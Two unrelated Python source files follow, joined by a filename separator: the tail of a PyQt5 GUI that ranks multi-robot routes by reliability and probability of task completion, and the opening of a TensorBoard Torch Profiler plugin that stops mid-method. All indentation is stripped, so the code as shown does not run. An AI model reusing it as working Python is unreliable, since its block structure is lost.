self.pushButton_start_analysis.setGeometry(QtCore.QRect(690, 550, 150, 75))
font = QtGui.QFont()
font.setPointSize(15)
self.pushButton_start_analysis.setFont(font)
self.pushButton_start_analysis.setObjectName("pushButton_start_analysis")
self.groupBox_robot_configuration = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox_robot_configuration.setEnabled(False)
self.groupBox_robot_configuration.setGeometry(QtCore.QRect(20, 400, 570, 271))
font = QtGui.QFont()
font.setPointSize(15)
self.groupBox_robot_configuration.setFont(font)
self.groupBox_robot_configuration.setObjectName("groupBox_robot_configuration")
self.label_12 = QtWidgets.QLabel(self.groupBox_robot_configuration)
self.label_12.setGeometry(QtCore.QRect(0, 30, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_12.setFont(font)
self.label_12.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_12.setObjectName("label_12")
self.comboBox_select_robot = QtWidgets.QComboBox(self.groupBox_robot_configuration)
self.comboBox_select_robot.setGeometry(QtCore.QRect(275, 30, 150, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.comboBox_select_robot.setFont(font)
self.comboBox_select_robot.setObjectName("comboBox_select_robot")
self.label_7 = QtWidgets.QLabel(self.groupBox_robot_configuration)
self.label_7.setGeometry(QtCore.QRect(400, 230, 71, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_7.setFont(font)
self.label_7.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.label_7.setObjectName("label_7")
self.label_6 = QtWidgets.QLabel(self.groupBox_robot_configuration)
self.label_6.setGeometry(QtCore.QRect(400, 180, 71, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_6.setFont(font)
self.label_6.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.label_6.setObjectName("label_6")
self.doubleSpinBox_nominal_capacity_value = QtWidgets.QDoubleSpinBox(self.groupBox_robot_configuration)
self.doubleSpinBox_nominal_capacity_value.setGeometry(QtCore.QRect(275, 230, 100, 35))
self.doubleSpinBox_nominal_capacity_value.setDecimals(1)
self.doubleSpinBox_nominal_capacity_value.setMaximum(100000.0)
self.doubleSpinBox_nominal_capacity_value.setSingleStep(0.5)
self.doubleSpinBox_nominal_capacity_value.setObjectName("doubleSpinBox_nominal_capacity_value")
self.doubleSpinBox_robot_speed_value = QtWidgets.QDoubleSpinBox(self.groupBox_robot_configuration)
self.doubleSpinBox_robot_speed_value.setGeometry(QtCore.QRect(275, 180, 100, 35))
self.doubleSpinBox_robot_speed_value.setDecimals(3)
self.doubleSpinBox_robot_speed_value.setMaximum(100.0)
self.doubleSpinBox_robot_speed_value.setObjectName("doubleSpinBox_robot_speed_value")
self.label_4 = QtWidgets.QLabel(self.groupBox_robot_configuration)
self.label_4.setGeometry(QtCore.QRect(0, 230, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_4.setFont(font)
self.label_4.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_4.setObjectName("label_4")
self.lineEdit_hazard_rate_value = QtWidgets.QLineEdit(self.groupBox_robot_configuration)
self.lineEdit_hazard_rate_value.setGeometry(QtCore.QRect(275, 80, 200, 35))
self.lineEdit_hazard_rate_value.setObjectName("lineEdit_hazard_rate_value")
self.label = QtWidgets.QLabel(self.groupBox_robot_configuration)
self.label.setGeometry(QtCore.QRect(0, 80, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label.setFont(font)
self.label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(self.groupBox_robot_configuration)
self.label_2.setGeometry(QtCore.QRect(0, 180, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_2.setFont(font)
self.label_2.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_2.setObjectName("label_2")
self.lineEdit_start_reliability_value = QtWidgets.QLineEdit(self.groupBox_robot_configuration)
self.lineEdit_start_reliability_value.setGeometry(QtCore.QRect(275, 130, 200, 35))
self.lineEdit_start_reliability_value.setObjectName("lineEdit_start_reliability_value")
self.label_13 = QtWidgets.QLabel(self.groupBox_robot_configuration)
self.label_13.setGeometry(QtCore.QRect(0, 130, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_13.setFont(font)
self.label_13.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_13.setObjectName("label_13")
MainWindow.setCentralWidget(self.centralwidget)
# ---------------------------------------------------------------------------------------------------------------
self.potc_gui_main_func()
# ---------------------------------------------------------------------------------------------------------------
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Prognostic Aware Multi Robot Route Planning"))
self.groupBox_selection_analysis.setTitle(_translate("MainWindow", "Analysis Options"))
self.label_5.setText(_translate("MainWindow", "Select Threshold Type"))
self.label_8.setText(_translate("MainWindow", "Threshold Value"))
self.label_9.setText(_translate("MainWindow", "Route Count"))
self.label_10.setText(_translate("MainWindow", "Note: It refers to the number of routes to be analyzed. If the value is 0, it refers to the maximum value."))
self.label_3.setText(_translate("MainWindow", "Use Load Data"))
self.pushButton_set_robot_count.setText(_translate("MainWindow", "Set Count"))
self.label_11.setText(_translate("MainWindow", "Set Robot Count"))
self.pushButton_start_analysis.setText(_translate("MainWindow", "Start Analysis"))
self.groupBox_robot_configuration.setTitle(_translate("MainWindow", "Robot Configuration"))
self.label_12.setText(_translate("MainWindow", "Select Robot"))
self.label_7.setText(_translate("MainWindow", "kg"))
self.label_6.setText(_translate("MainWindow", "km / h"))
self.label_4.setText(_translate("MainWindow", "Nominal Capacity Value"))
self.label.setText(_translate("MainWindow", "Hazard Rate Value"))
self.label_2.setText(_translate("MainWindow", "Robot Speed Value"))
self.label_13.setText(_translate("MainWindow", "Start Reliability Value"))
# ------------------------------------------------------------------------------------------------
def potc_gui_main_func(self):
self.gui_default_parameters_func()
self.potc_gui_events_func()
def gui_default_parameters_func(self):
load_data_list = list(["True", "False"])
self.comboBox_load_data.addItems(load_data_list)
filter_list = list(["POTC Value", "Reliability Value"])
self.comboBox_select_threshold_type.addItems(filter_list)
self.doubleSpinBox_threshold_value.setValue(0.5)
self.spinBox_route_count.setValue(0)
self.comboBox_select_robot.addItem("None")
self.pushButton_start_analysis.setEnabled(False)
def potc_gui_events_func(self):
self.pushButton_set_robot_count.clicked.connect(self.click_set_robot_count_button_func)
self.pushButton_start_analysis.clicked.connect(self.click_start_analysis_button_func)
self.lineEdit_hazard_rate_value.textChanged.connect(self.event_lineEdit_hazard_rate_value_func)
self.doubleSpinBox_robot_speed_value.valueChanged.connect(self.event_doubleSpinBox_robot_speed_value_func)
self.comboBox_load_data.currentIndexChanged.connect(self.event_comboBox_load_data_func)
self.doubleSpinBox_nominal_capacity_value.valueChanged.connect(self.event_doubleSpinBox_nominal_capacity_value_func)
self.comboBox_select_threshold_type.currentIndexChanged.connect(self.event_comboBox_select_threshold_type_func)
self.doubleSpinBox_threshold_value.valueChanged.connect(self.event_doubleSpinBox_threshold_value_func)
self.spinBox_route_count.valueChanged.connect(self.event_spinBox_route_count_func)
self.comboBox_select_robot.currentIndexChanged.connect(self.event_comboBox_select_robot_func)
self.lineEdit_start_reliability_value.textChanged.connect(self.event_lineEdit_start_reliability_value_func)
def click_set_robot_count_button_func(self):
self.robot_count = self.spinBox_robot_route_count.value()
if self.robot_count > 6:
self.robot_count = 6
self.initial_configuration_dicts_func(self.robot_count)
print(self.initial_configuration_dict)
robot_list = list()
for item in range(len(list(self.initial_configuration_dict.keys()))):
robot_list.append(str("Robot " + str(item + 1)))
self.comboBox_select_robot.addItems(robot_list)
self.main_read_func(self.robot_count)
self.label_11.setEnabled(False)
self.spinBox_robot_route_count.setEnabled(False)
self.pushButton_set_robot_count.setEnabled(False)
self.groupBox_robot_configuration.setEnabled(True)
self.pushButton_start_analysis.setEnabled(True)
def click_start_analysis_button_func(self):
try:
potc_class = CalculatePOTC(self.robot_count, self.robot_main_dict, self.initial_configuration_dict, self.distance_list, self.load_control, self.threshold_type, self.threshold_value, self.route_count)
#potc_class.calculate_main_potc_func()
#calculate_thread = threading.Thread(target=potc_class.calculate_main_potc_func)
#calculate_thread.start()
#calculate_thread.join()
now = datetime.now()
dt_string = now.strftime("%Y_%m_%d_-_%H_%M_%S")
if self.load_control:
file_name = str("potc_analysis_loaded_" + str(dt_string))
else:
file_name = str("potc_analysis_unloaded_" + str(dt_string))
self.csv_write(potc_class.write_data_list, file_name)
print("\n\n\nDosya Yazma islemi Basari ile gerceklesti")
set_value = potc_class.selected_route_count_list
self.set_plain_text_edit_result_view_func(set_value)
except Exception as err:
print("\n\nError: click_start_analysis_button_func")
print(err)
def event_lineEdit_hazard_rate_value_func(self):
try:
selected_cb_robot = str(self.comboBox_select_robot.currentText())
selected_robot = selected_cb_robot.split("Robot ")[-1]
if selected_cb_robot != "None" and selected_cb_robot != "":
get_value = self.lineEdit_hazard_rate_value.text()
if get_value != "":
self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Hazard Rate"] = float(get_value)
except Exception as err:
print("\n\nError: event_lineEdit_hazard_rate_value_func")
print(err)
def event_doubleSpinBox_robot_speed_value_func(self):
try:
selected_cb_robot = str(self.comboBox_select_robot.currentText())
selected_robot = selected_cb_robot.split("Robot ")[-1]
if selected_cb_robot != "None" and selected_cb_robot != "":
get_value = self.doubleSpinBox_robot_speed_value.value()
self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Speed"] = float(get_value)
except Exception as err:
print("\n\nError: event_doubleSpinBox_robot_speed_value_func")
print(err)
def event_comboBox_load_data_func(self):
try:
get_value = str(self.comboBox_load_data.currentText())
if get_value == "True":
self.load_control = True
else:
self.load_control = False
except Exception as err:
print("\n\nError: comboBox_load_data")
print(err)
def event_doubleSpinBox_nominal_capacity_value_func(self):
try:
selected_cb_robot = str(self.comboBox_select_robot.currentText())
selected_robot = selected_cb_robot.split("Robot ")[-1]
if selected_cb_robot != "None" and selected_cb_robot != "":
get_value = self.doubleSpinBox_nominal_capacity_value.value()
self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Nominal Capacity"] = float(get_value)
except Exception as err:
print("\n\nError: event_doubleSpinBox_nominal_capacity_value_func")
print(err)
def event_comboBox_select_threshold_type_func(self):
try:
get_value = str(self.comboBox_select_threshold_type.currentText())
if get_value == "POTC Value":
self.threshold_type = True
elif get_value == "Reliability Value":
self.threshold_type = False
except Exception as err:
print("\n\nError: event_comboBox_select_threshold_type_func")
print(err)
def event_doubleSpinBox_threshold_value_func(self):
try:
get_value = self.doubleSpinBox_threshold_value.value()
self.threshold_value = float(get_value)
except Exception as err:
print("\n\nError: event_doubleSpinBox_threshold_value_func")
print(err)
def event_spinBox_route_count_func(self):
try:
get_value = self.spinBox_route_count.value()
self.route_count = int(get_value)
except Exception as err:
print("\n\nError: event_spinBox_route_count_func")
print(err)
def event_comboBox_select_robot_func(self):
try:
selected_cb_robot = str(self.comboBox_select_robot.currentText())
if selected_cb_robot != "None" and selected_cb_robot != "":
selected_robot = selected_cb_robot.split("Robot ")[-1]
self.set_enable_robot_configuration_group_func(True)
self.lineEdit_hazard_rate_value.setText(str(self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Hazard Rate"]))
self.lineEdit_start_reliability_value.setText(str(self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Reliability"]))
self.doubleSpinBox_robot_speed_value.setValue(float(self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Speed"]))
self.doubleSpinBox_nominal_capacity_value.setValue(float(self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Nominal Capacity"]))
else:
self.lineEdit_hazard_rate_value.setText("")
self.lineEdit_start_reliability_value.setText("")
self.doubleSpinBox_robot_speed_value.setValue(0.0)
self.doubleSpinBox_nominal_capacity_value.setValue(0.0)
self.set_enable_robot_configuration_group_func(False)
except Exception as err:
print("\n\nError: event_comboBox_select_robot_func")
print(err)
def event_lineEdit_start_reliability_value_func(self):
try:
selected_cb_robot = str(self.comboBox_select_robot.currentText())
selected_robot = selected_cb_robot.split("Robot ")[-1]
if selected_cb_robot != "None" and selected_cb_robot != "":
get_value = self.lineEdit_start_reliability_value.text()
if get_value != "":
self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Reliability"] = float(get_value)
except Exception as err:
print("\n\nError: event_lineEdit_start_reliability_value_func")
print(err)
def set_plain_text_edit_result_view_func(self, set_value):
self.plainTextEdit_result_view.clear()
write_value = ""
for item in set_value:
temp = str(item[0]) + "\t-> " + str(item[1])
write_value = write_value + "\n" + temp
self.plainTextEdit_result_view.setPlainText(write_value)
# ------------------------------------------------------------------------------------------------
@classmethod
def get_current_workspace(cls):
"""
Get Current Workspace Function
"""
file_full_path = os.path.dirname(os.path.realpath(__file__))
directory_name = sys.argv[0].split('/')[-2]
workspace_name = file_full_path.split(str(directory_name))[0]
return workspace_name
def read_distance_file_func(self):
df = pd.read_csv(str(self.current_workspace) + 'potc_analysis/params/' + str(self.distance_filename) + '.csv', sep=',', header=None)
self.distance_list = df.values
def read_route_loads_func(self, robot_no):
with open(str(self.current_workspace) + 'potc_analysis/params/' + str(self.route_load_filename) + '.csv', 'r') as csvfile:
read_data = csv.reader(csvfile, delimiter=',')
next(read_data)
robot_load_dict = dict()
for row in read_data:
robot_load_list = list()
for row_count in range(self.robot_column_no_dict["Yuk"]["Count"]):
robot_load_list.append(float(row[int(self.robot_column_no_dict["Yuk"][str(robot_no)] + row_count)]))
robot_load_dict[str(row[0])] = robot_load_list
self.robot_main_dict["Yuk"][str("robot_" + str(robot_no))] = robot_load_dict
def read_route_func(self, robot_no):
with open(str(self.current_workspace) + 'potc_analysis/params/' + str(self.route_set_filename) + '.csv', 'r') as csvfile:
read_data = csv.reader(csvfile, delimiter=',')
next(read_data)
robot_route_dict = dict()
for row in read_data:
robot_route_list = list()
for row_count in range(int(row[int(self.robot_column_no_dict["Mesafe"][str(robot_no)] - 1)])):
robot_route_list.append(float(row[int(self.robot_column_no_dict["Mesafe"][str(robot_no)] + row_count)]))
robot_route_dict[str(row[0])] = robot_route_list
self.robot_main_dict["Mesafe"][str("robot_" + str(robot_no))] = robot_route_dict
def read_speed_func(self, robot_no):
with open(str(self.current_workspace) + 'potc_analysis/params/' + str(self.route_set_filename) + '.csv', 'r') as csvfile:
read_data = csv.reader(csvfile, delimiter=',')
next(read_data)
robot_speed_dict = dict()
for row in read_data:
robot_speed_list = list()
for row_count in range(int(row[int(self.robot_column_no_dict["Mesafe"][str(robot_no)] - 1)]) - 1):
robot_speed_list.append(float(row[int(self.robot_column_no_dict["Hiz"][str(robot_no)] + row_count)]))
robot_speed_dict[str(row[0])] = robot_speed_list
self.robot_main_dict["Hiz"][str("robot_" + str(robot_no))] = robot_speed_dict
def main_read_func(self, robot_count):
self.read_distance_file_func()
for cnt in range(robot_count):
self.read_route_loads_func((cnt + 1))
self.read_route_func((cnt + 1))
def csv_write(self, write_data_list, file_name):
with open(str(self.current_workspace) + 'potc_analysis/params/write_data/'+ str(file_name) + '.csv','w+') as csvFile:
writer = csv.writer(csvFile)
writer.writerows(write_data_list)
csvFile.close()
# -------------------------------------------------------------------
def initial_configuration_dicts_func(self, robot_count):
value = 0.05
for item in range(robot_count):
#self.initial_configuration_dict[str("robot_" + str(item + 1))] = {"Hazard Rate": float(5.07e-04), "Reliability": float(1), "Nominal Capacity": float(200), "Speed": float(4.32)}
self.initial_configuration_dict[str("robot_" + str(item + 1))] = {"Hazard Rate": float(5.07e-04), "Reliability": float(1 - (item * value)), "Nominal Capacity": float(200), "Speed": float(4.32)}
def set_enable_robot_configuration_group_func(self, status):
self.lineEdit_hazard_rate_value.setEnabled(status)
self.lineEdit_start_reliability_value.setEnabled(status)
self.doubleSpinBox_robot_speed_value.setEnabled(status)
self.doubleSpinBox_nominal_capacity_value.setEnabled(status)
self.label.setEnabled(status)
self.label_13.setEnabled(status)
self.label_2.setEnabled(status)
self.label_4.setEnabled(status)
self.label_6.setEnabled(status)
self.label_7.setEnabled(status)
# -------------------------------------------------------------------
class CalculatePOTC:
"""
km / h
"""
def __init__(self, robot_count, robot_main_dict, initial_configuration_dict, distance_list, load_control, threshold_type, threshold_value, route_count):
self.robot_count = robot_count
self.initial_configuration_dict = initial_configuration_dict
self.robot_main_dict = robot_main_dict
self.distance_list = distance_list
self.load_control = load_control
self.threshold_type = threshold_type
self.threshold_value = threshold_value
if route_count == 0:
self.robot_main_dict_count = len(list(self.robot_main_dict["Mesafe"][str("robot_" + str(self.robot_count))].keys()))
self.route_count = self.robot_main_dict_count
else:
self.route_count = route_count
self.write_data_list = list()
self.selected_route_count_list = list()
self.system_main_dict = dict()
self.system_main_dict["0"] = {"POTC": 1, "Reliability": 1, "Secili Rota": 0, "Robot Reliability": list(), "Robot Time": list(), "Robot Distance": list()}
self.initial_system_main_dict_func()
@classmethod
def failure_rate_calculation_using_operating_load_func(cls, failure_rate, p_value, p_0):
"""
λ = λ0 * ((P + P0) / P0) ^ 3
"""
result = float(failure_rate * pow(((float(p_value) + float(p_0)) / float(p_0)), 3))
return result
@classmethod
def probability_of_task_completion_formula(cls, reliability, distance):
potc_result = float(pow(float(reliability), float(distance)))
return potc_result
@classmethod
def calculate_time_func(cls, distance, speed):
time = float(distance / speed)
return time
@classmethod
def reliability_exponential_func(cls, reliability_time, failure_rate):
"""
Reliability Model = Exponential Distribution
R = e ^ -(λt)
"""
return float(math.exp(float(-1) * float(reliability_time) * float(failure_rate)))
@classmethod
def time_convert_function(cls, time_value):
seconds = float(time_value)*60*60
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
result = "%02d:%02d:%02d"%(hours,minutes,seconds)
return result
def initial_system_main_dict_func(self):
robot_reliability_list = list()
robot_time_list = list()
robot_distance_list = list()
for item in range(self.robot_count):
robot_reliability_list.append(self.initial_configuration_dict[str("robot_" + str(item + 1))]["Reliability"])
robot_time_list.append(float(0.0))
robot_distance_list.append(float(0.0))
self.system_main_dict["0"]["Robot Reliability"] = robot_reliability_list
self.system_main_dict["0"]["Robot Time"] = robot_time_list
self.system_main_dict["0"]["Robot Distance"] = robot_distance_list
def set_write_data_list_func(self):
key_count = len(list(self.system_main_dict.keys()))
# Headers
temp_list = list()
temp_list.append("Count")
temp_list.append(str(""))
temp_list.append("Secili Rota")
temp_list.append(str(""))
temp_list.append("POTC")
temp_list.append(str(""))
temp_list.append("Reliability")
temp_list.append(str(""))
temp_list.append("Robot Reliability ->")
for cnt in range(self.robot_count):
temp_list.append(str("Robot " + str(cnt + 1)))
temp_list.append(str(""))
temp_list.append("Robot Zaman ->")
for cnt in range(self.robot_count):
temp_list.append(str("Robot " + str(cnt + 1)))
temp_list.append(str(""))
temp_list.append("Robot Mesafe ->")
for cnt in range(self.robot_count):
temp_list.append(str("Robot " + str(cnt + 1)))
temp_list.append(str(""))
temp_list.append("Ortalama Zaman")
temp_list.append(str(""))
temp_list.append("Ortalama Mesafe")
temp_list.append(str(""))
temp_list.append("Rota Secilme Miktari ->")
temp_list.append("Rota Numarasi")
temp_list.append("Secilme Miktari")
self.write_data_list.append(temp_list)
filter_list = list()
for item in range(key_count):
temp_list = list()
time_list = list()
distance_list = list()
temp_list.append(str(item))
temp_list.append(str(""))
temp_list.append(self.system_main_dict[str(item)]["Secili Rota"])
filter_list.append(self.system_main_dict[str(item)]["Secili Rota"])
temp_list.append(str(""))
temp_list.append(self.system_main_dict[str(item)]["POTC"])
temp_list.append(str(""))
temp_list.append(self.system_main_dict[str(item)]["Reliability"])
temp_list.append(str(""))
temp_list.append(str(""))
for cnt in range(self.robot_count):
temp_list.append(self.system_main_dict[str(item)]["Robot Reliability"][cnt])
temp_list.append(str(""))
temp_list.append(str(""))
for cnt in range(self.robot_count):
temp_list.append(self.system_main_dict[str(item)]["Robot Time"][cnt])
temp_list.append(str(""))
for cnt in range(self.robot_count):
time_list.append(self.system_main_dict[str(item)]["Robot Time"][cnt])
temp_list.append(str(""))
for cnt in range(self.robot_count):
temp_list.append(self.system_main_dict[str(item)]["Robot Distance"][cnt])
temp_list.append(str(""))
for cnt in range(self.robot_count):
distance_list.append(self.system_main_dict[str(item)]["Robot Distance"][cnt])
time_average = self.average_list_func(time_list)
temp_list.append(self.time_convert_function(time_average))
temp_list.append(str(""))
distance_average = self.average_list_func(distance_list)
temp_list.append(distance_average)
self.write_data_list.append(temp_list)
uniq_filter_list = list(dict.fromkeys(filter_list))
for item in uniq_filter_list:
if item != 0:
temp = [item, filter_list.count(item)]
self.selected_route_count_list.append(temp)
for i in range(len(self.selected_route_count_list)):
self.write_data_list[(i+1)].append(str(""))
self.write_data_list[(i+1)].append(str(""))
self.write_data_list[(i+1)].append(self.selected_route_count_list[i][0])
self.write_data_list[(i+1)].append(self.selected_route_count_list[i][1])
def average_list_func(self, temp_list):
result = 0.0
for item in temp_list:
result += float(item)
list_count = len(temp_list)
average_result = float(result / list_count)
return average_result
def calculate_system_reliability_func(self, robot_reliability_list):
system_reliability = 1
for rlblty in robot_reliability_list:
system_reliability *= rlblty
return system_reliability
def get_mesafe_and_zaman_list_func(self, temp_mesafe_list, robot_cnt):
list_count = len(temp_mesafe_list)
mesafe_list = list()
zaman_list = list()
for count in range(list_count - 1):
mesafe = float(self.distance_list[int(temp_mesafe_list[count])][int(temp_mesafe_list[count + 1])]) / 1000
robot_speed_value = float(self.initial_configuration_dict[str("robot_" + str(robot_cnt))]["Speed"])
zaman = self.calculate_time_func(mesafe, robot_speed_value)
mesafe_list.append(mesafe)
zaman_list.append(zaman)
return mesafe_list, zaman_list
def calculate_potc_and_reliability_func(self, process_count, mesafe_list, zaman_list, route_cnt, robot_cnt):
time_value = float(0)
distance_value = float(0)
reliability_value = self.system_main_dict[str(process_count - 1)]["Robot Reliability"][robot_cnt - 1]
potc_value = float(0)
for item_count in range(len(mesafe_list)):
selected_robot_hazard_rate = float(self.initial_configuration_dict[str("robot_" + str(robot_cnt))]["Hazard Rate"])
selected_robot_nominal_capacity = float(self.initial_configuration_dict[str("robot_" + str(robot_cnt))]["Nominal Capacity"])
if self.load_control:
p_value = self.robot_main_dict["Yuk"][str("robot_" + str(robot_cnt))][str(route_cnt)][item_count]
hazard_rate = self.failure_rate_calculation_using_operating_load_func(selected_robot_hazard_rate, p_value, selected_robot_nominal_capacity)
else:
hazard_rate = selected_robot_hazard_rate
time_value += zaman_list[item_count]
distance_value += mesafe_list[item_count]
new_reliability = self.reliability_exponential_func(zaman_list[item_count], hazard_rate)
reliability_value = reliability_value * new_reliability
potc_value = float(self.probability_of_task_completion_formula(reliability_value, mesafe_list[item_count]))
return potc_value, reliability_value, time_value, distance_value
def calculate_robot_potc_and_reliability_func(self, process_count, route_cnt):
robot_potc_value = float(1)
robot_reliability_value_list = list()
robot_distance_list = list()
robot_time_list = list()
for j in range(self.robot_count):
robot_cnt = int(j + 1)
mesafe_list = list()
zaman_list = list()
temp_mesafe_list = list(self.robot_main_dict["Mesafe"][str("robot_" + str(robot_cnt))][str(route_cnt)])
mesafe_list, zaman_list = self.get_mesafe_and_zaman_list_func(temp_mesafe_list, robot_cnt)
potc_value, reliability_value, time_value, distance_value = self.calculate_potc_and_reliability_func(process_count, mesafe_list, zaman_list, route_cnt, robot_cnt)
robot_potc_value *= float(potc_value)
robot_reliability_value_list.append(reliability_value)
robot_time_list.append(time_value)
robot_distance_list.append(distance_value)
return robot_potc_value, robot_reliability_value_list, robot_time_list, robot_distance_list
def calculate_main_potc_func(self):
loop_control = False
process_count = 0
while not loop_control:
process_count += 1
self.system_main_dict[str(process_count)] = {"POTC": 1, "Reliability": 1, "Secili Rota": 0, "Robot Reliability": list()}
potc_list = list([0])
robot_reliability_list = list([0])
system_reliability_list = list([0])
time_list = list([0])
distance_list = list([0])
for i in range(self.route_count):
route_cnt = int(i + 1)
robot_potc_value, robot_reliability_value_list, robot_time_list, robot_distance_list = self.calculate_robot_potc_and_reliability_func(process_count, route_cnt)
potc_list.append(float(robot_potc_value))
robot_reliability_list.append(robot_reliability_value_list)
system_reliability_value = self.calculate_system_reliability_func(robot_reliability_value_list)
system_reliability_list.append(float(system_reliability_value))
time_list.append(robot_time_list)
distance_list.append(robot_distance_list)
if self.threshold_type:
best_value_index = potc_list.index(max(potc_list))
print("POTC Value = {0:2.15f} -> System Reliability = {1:2.15f}".format(potc_list[best_value_index], system_reliability_list[best_value_index]))
if potc_list[best_value_index] < self.threshold_value:
loop_control = True
else:
best_value_index = system_reliability_list.index(max(system_reliability_list))
print("System Reliability = {0:2.15f} -> POTC Value = {1:2.15f}".format(system_reliability_list[best_value_index], potc_list[best_value_index]))
if system_reliability_list[best_value_index] < self.threshold_value:
loop_control = True
self.system_main_dict[str(process_count)]["POTC"] = potc_list[best_value_index]
self.system_main_dict[str(process_count)]["Reliability"] = system_reliability_list[best_value_index]
self.system_main_dict[str(process_count)]["Secili Rota"] = best_value_index
self.system_main_dict[str(process_count)]["Robot Reliability"] = robot_reliability_list[best_value_index]
self.system_main_dict[str(process_count)]["Robot Time"] = time_list[best_value_index]
self.system_main_dict[str(process_count)]["Robot Distance"] = distance_list[best_value_index]
print("Process Count -> " + str(process_count) + " Selected Route -> " + str(best_value_index))
print("\n")
self.set_write_data_list_func()
if __name__ == '__main__':
#try:
#rospy.init_node('start_potc_analysis')
app = QtWidgets.QApplication(sys.argv)
MAIN_WINDOW = QtWidgets.QMainWindow()
POTC_Gui = POTC_Analysis()
POTC_Gui.setupUi(MAIN_WINDOW)
MAIN_WINDOW.show()
sys.exit(app.exec_())
"""
except Exception as err:
print(err)
"""
|
plugin.py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# --------------------------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import multiprocessing
import os
import threading
import time
from collections import OrderedDict
import werkzeug
from tensorboard.plugins import base_plugin
from werkzeug import wrappers
from . import consts
from . import utils
from .profiler import RunLoader
from .run import Run
logger = utils.get_logger()
class TorchProfilerPlugin(base_plugin.TBPlugin):
"""TensorBoard plugin for Torch Profiler."""
plugin_name = consts.PLUGIN_NAME
def __init__(self, context):
"""Instantiates TorchProfilerPlugin.
Args:
context: A base_plugin.TBContext instance.
"""
super(TorchProfilerPlugin, self).__init__(context)
self.logdir = os.path.abspath(context.logdir)
self._is_active = None
self._is_active_initialized_event = threading.Event()
self._runs = OrderedDict()
self._runs_lock = threading.Lock()
self._queue = multiprocessing.Queue()
monitor_runs = threading.Thread(target=self.monitor_runs, name="monitor_runs", daemon=True)
monitor_runs.start()
receive_runs = threading.Thread(target=self.receive_runs, name="receive_runs", daemon=True)
receive_runs.start()
def is_active(self):
"""Returns whether there is relevant data for the plugin to process.
"""
self._is_active_initialized_event.wait()
return self._is_active
def get_plugin_apps(self):
return {
"/index.js": self.static_file_route,
"/main.js": self.static_file_route,
"/index.html": self.static_file_route,
"/overall.html": self.static_file_route,
"/trace_viewer_full.html": self.static_file_route,
"/trace_embedding.html": self.static_file_route,
"/operator.html": self.static_file_route,
"/kernel.html": self.static_file_route,
"/runs": self.runs_route,
"/views": self.views_route,
"/workers": self.workers_route,
"/overview": self.overview_route,
"/operation": self.operation_pie_route,
"/operation/table": self.operation_table_route,
"/kernel": self.kernel_pie_route,
"/kernel/table": self.kernel_table_route,
"/trace": self.trace_route
}
def frontend_metadata(self):
return base_plugin.FrontendMetadata(es_module_path="/index.js")
def monitor_runs(self):
logger.info("Monitor runs begin")
# Set _is_active quickly based on file pattern match, don't wait for data loading
self._is_active = any(self._get_run_dirs())
self._is_active_initialized_event.set()
touched = set()
while True:
try:
logger.debug("Scan run dir")
run_dirs = self._get_run_dirs()
# Assume no deletion on run directories, trigger async load if find a new run
for name, run_dir in run_dirs:
if name not in touched:
logger.info("Find run %s under %s", name, run_dir)
touched.add(name)
# Use multiprocessing to avoid UI stall and reduce data parsing time
process = multiprocessing.Process(target=_load_run, args=(self._queue, name, run_dir))
process.daemon = True
process.start()
except Exception as ex:
logger.warning("Failed to scan runs. Exception=%s", ex, exc_info=True)
time.sleep(consts.MONITOR_RUN_REFRESH_INTERNAL_IN_SECONDS)
def receive_runs(self):
while True:
run = self._queue.get()
if run is None:
continue
logger.info("Add run %s", run.name)
with self._runs_lock:
is_new = run.name not in self._runs
self._runs[run.name] = run
if is_new:
self._runs = OrderedDict(sorted(self._runs.items()))
# Update is_active
if not self._is_active:
self._is_active = True
def _get_run_dirs(self):
"""Scan logdir, find PyTorch Profiler run directories.
A directory is considered to be a run if it contains 1 or more *.pt.trace.json[.gz].
E.g. there are 2 runs: run1, run2
/run1
/[worker1].pt.trace.json.gz
/[worker2].pt.trace.json.gz
/run2
/[worker1].pt.trace.json
"""
for root, _, files in os.walk(self.logdir):
for file in files:
if utils.is_chrome_trace_file(file):
run_dir = os.path.abspath(root)
if run_dir == self.logdir:
name = os.path.basename(run_dir)
else:
name = os.path.relpath(run_dir, self.logdir)
yield name, run_dir
break
def get_run(self, name) -> Run:
with self._runs_lock:
return self._runs.get(name, None)
@wrappers.Request.application
def runs_route(self, request):
with self._runs_lock:
names = list(self._runs.keys())
return self.respond_as_json(names)
@wrappers.Request.application
def views_route(self, request):
name = request.args.get("run")
run = self.get_run(name)
